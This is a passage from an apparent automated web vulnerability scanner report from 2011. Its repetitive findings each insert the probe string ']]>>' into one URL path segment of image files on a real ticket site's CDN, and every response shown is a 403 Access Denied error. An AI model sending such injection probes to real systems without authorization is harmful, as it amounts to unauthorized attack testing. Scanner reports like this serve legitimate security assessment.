x-amz-id-2: 7O1AtTgu4M6wTVTVZOE2uDmL3Q93k8l1D+AKyD3NoGv72FIGSjSd+Q0SFTO2rzhm
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:23 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bc96c08db2ccd7e91859aba23cfc7c58824ac62f729ce068e941c4860ecdc1c8a927db679c5e2164
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4D26063BF8FA7B0B</RequestId><HostId>7O1AtTgu4M6wTVTVZOE2uDmL3Q93k8l1D+AKyD3NoGv72FIGSj
...[SNIP]...

8.117. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F4898166960B9D11
x-amz-id-2: Cb9FRaEbsRY54i+fpy7l4dExWqT8oyYpNFQEN0Ge8Eo5Rm7CzDrKg8ovtJuvZN89
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:28 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 164e7cbacd34776c092bfcbbd1b1184e424336b9ff12fe5a519832cdff5c08f00c3834012e67cdf1
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F4898166960B9D11</RequestId><HostId>Cb9FRaEbsRY54i+fpy7l4dExWqT8oyYpNFQEN0Ge8Eo5Rm7CzD
...[SNIP]...

8.118. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-cc3333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: B4E6F9E0F157F60D
x-amz-id-2: 8IJBD8fK6J/3WlwZ3vD3FqGsU5+rXl3LFhfjuxDImjE5fFnODk1tdpGQrknS7kiX
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:13 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: fa904438d0c850b8dd6bc647f2bcd0276c796b4f046504eaecb6bb9512161f34c3d8d846f971c454
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B4E6F9E0F157F60D</RequestId><HostId>8IJBD8fK6J/3WlwZ3vD3FqGsU5+rXl3LFhfjuxDImjE5fFnODk
...[SNIP]...

8.119. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-cc3333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AD0D2B1EC367C6FF
x-amz-id-2: aTCSDf62X2oPeNg9XEufIFenbzK+lW/toib+Tqse89Tk2bBsR8OpUGvZMIdyQ1H6
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:18 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bf39725ff52e8bd00c36f281ad6c45831e20a21995afc0d09015cbdf1d9492e25923599c0d22caec
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AD0D2B1EC367C6FF</RequestId><HostId>aTCSDf62X2oPeNg9XEufIFenbzK+lW/toib+Tqse89Tk2bBsR8
...[SNIP]...

8.120. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-cc3333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 7CEE2CC80A98734B
x-amz-id-2: qeUIXNdkPEPaxAGTB1Bu4+TGEIp0ulLqvDyMKYX1prPRtolxsGuafBIHRjduelHe
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:24 GMT
Server: AmazonS3
Age: 2
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 9d8a5fed6e6d972787e049d6d1d86724b179c52ffdb7e5bc5950eda3302f0d678438f0d94c28f595
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>7CEE2CC80A98734B</RequestId><HostId>qeUIXNdkPEPaxAGTB1Bu4+TGEIp0ulLqvDyMKYX1prPRtolxsG
...[SNIP]...

8.121. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: EB8B43F09E46589F
x-amz-id-2: hovBFBlPZ+/UTWGUS9sOQ2W/XiUhkx/6ZA/QhwO7Hsf0gVZHP8hY4n2w7KoWlTkd
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:29 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 14809b21fa1cbe5523f7ecfedbfc5db48ee0342cf2e50cf1e695d3c460a71e2c14bb342bf97293cf
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EB8B43F09E46589F</RequestId><HostId>hovBFBlPZ+/UTWGUS9sOQ2W/XiUhkx/6ZA/QhwO7Hsf0gVZHP8
...[SNIP]...

8.122. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-cc3333-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 2ADF40194E084633
x-amz-id-2: mnUcpBlcgN+W8cOAoQHkSU/unTtILGzXBAD7bV2n0ArWLaIMoNqUHJ0g2Mxy32uV
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:59 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 1d017cc89ec9c9aeef20cec1f0fbe245b183127503ab14a64afb0fd20e17badf43381c904964436d
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2ADF40194E084633</RequestId><HostId>mnUcpBlcgN+W8cOAoQHkSU/unTtILGzXBAD7bV2n0ArWLaIMoN
...[SNIP]...

8.123. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-cc3333-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 059BBEB2EB8124C5
x-amz-id-2: MdJGpWG1qRx4tymq+AHDRqqwVtLpmUH8CgyHmhoFlg3zpJYXJ3B7CCAcXzhOUVe8
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:14 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 355a28f243484a05830482cde63e74bf4f6b4aec13273fc4c4357d0006c9579584e3739693452ded
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>059BBEB2EB8124C5</RequestId><HostId>MdJGpWG1qRx4tymq+AHDRqqwVtLpmUH8CgyHmhoFlg3zpJYXJ3
...[SNIP]...

8.124. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-cc3333-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E4C697EDE931CD19
x-amz-id-2: VXNJnrh3y768Ye+8jpNj8IkDT4Nqa8jAsE710zogc4qZ8Pr13Z5qVjrdGyGOGcjv
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:19 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ef8d9700f80ca23aad88976a4ac8e1e0abfe13f972446bdd083dfcf1cd0c61d013bfea42b8eba456
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E4C697EDE931CD19</RequestId><HostId>VXNJnrh3y768Ye+8jpNj8IkDT4Nqa8jAsE710zogc4qZ8Pr13Z
...[SNIP]...

8.125. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F4FAA48C4D736F08
x-amz-id-2: m6ZV6FRwpYWFCtNLyq0yI6V8c1aE6WTeOFaxWSSI9yiWnpI4dYeP3AwZMZ5UpPPA
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:25 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 464afedc325e8608d8b484a0d27324015951672f79fa12a7a661ea8343ca525b7d02d194fded0f9d
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F4FAA48C4D736F08</RequestId><HostId>m6ZV6FRwpYWFCtNLyq0yI6V8c1aE6WTeOFaxWSSI9yiWnpI4dY
...[SNIP]...

8.126. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff3333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 93A79499E53AB57F
x-amz-id-2: ntlcoqAcq7D9xadCQePOsU8N1N+gzbMkNkHADjSXvKjSwUxeIQK+hoYX3+JTvru4
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:00 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: a0a8fcda183941e26edbb508cefb04ed28723bc0801d54c9ce53e53318deedb96688bdc8525b8a24
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>93A79499E53AB57F</RequestId><HostId>ntlcoqAcq7D9xadCQePOsU8N1N+gzbMkNkHADjSXvKjSwUxeIQ
...[SNIP]...

8.127. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff3333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8C682DA149B3B916
x-amz-id-2: V6dEwZ3e+8/wMw3F6p+5SGs0gw0O9tj4A+cuWd79z7+al2MdEpHVAP3FUc4/1bly
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:10 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f692f9f3f098dc8b25dad9963aab54003c1961f88cbbe19ed154b7b490d88de4b45b0fd4efdd92f5
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8C682DA149B3B916</RequestId><HostId>V6dEwZ3e+8/wMw3F6p+5SGs0gw0O9tj4A+cuWd79z7+al2MdEp
...[SNIP]...

8.128. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff3333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F65F6487FF63B9A5
x-amz-id-2: Oh/WWDqr3+ulqllEckrt2So/cutpRQdgQp1q1bjnkpEzVXbRDisI/oItDxf2rAt9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:16 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e5c4171ba0b3d7a547ec4ca57ce4632c5cfa9e0b5fdd95ea1b53b386908dbe0bee09a63ff43b4f76
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F65F6487FF63B9A5</RequestId><HostId>Oh/WWDqr3+ulqllEckrt2So/cutpRQdgQp1q1bjnkpEzVXbRDi
...[SNIP]...

8.129. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 99ADDF1DD1A71543
x-amz-id-2: xF8gozuUX7cCTIu14wQskeqJU+af8/RJVeoZdB/pvIefYqVV+UZz3cXRAW9kwUG9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:19 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 04ad63783de3a806e64bf205490c72d2dff5df5bfa26b4b0e9d23ea3474f1c00ae3e1ffc58658e26
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>99ADDF1DD1A71543</RequestId><HostId>xF8gozuUX7cCTIu14wQskeqJU+af8/RJVeoZdB/pvIefYqVV+U
...[SNIP]...

8.130. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff3333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F41E2D4AEDD260D8
x-amz-id-2: Z6z9haYtqe9rB/DLWyBv1klTYdB19pDYmHaLR0JltWa4AygSk9hT35cN3SvuwORp
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ae7cb235a801921dbc7b7d1c5a36016df7ccd658bf5c07f4c4b21b2c9477ab1c732a3a020333f0db
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F41E2D4AEDD260D8</RequestId><HostId>Z6z9haYtqe9rB/DLWyBv1klTYdB19pDYmHaLR0JltWa4AygSk9
...[SNIP]...

8.131. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png [REST URL parameter 2] previous next

Summary

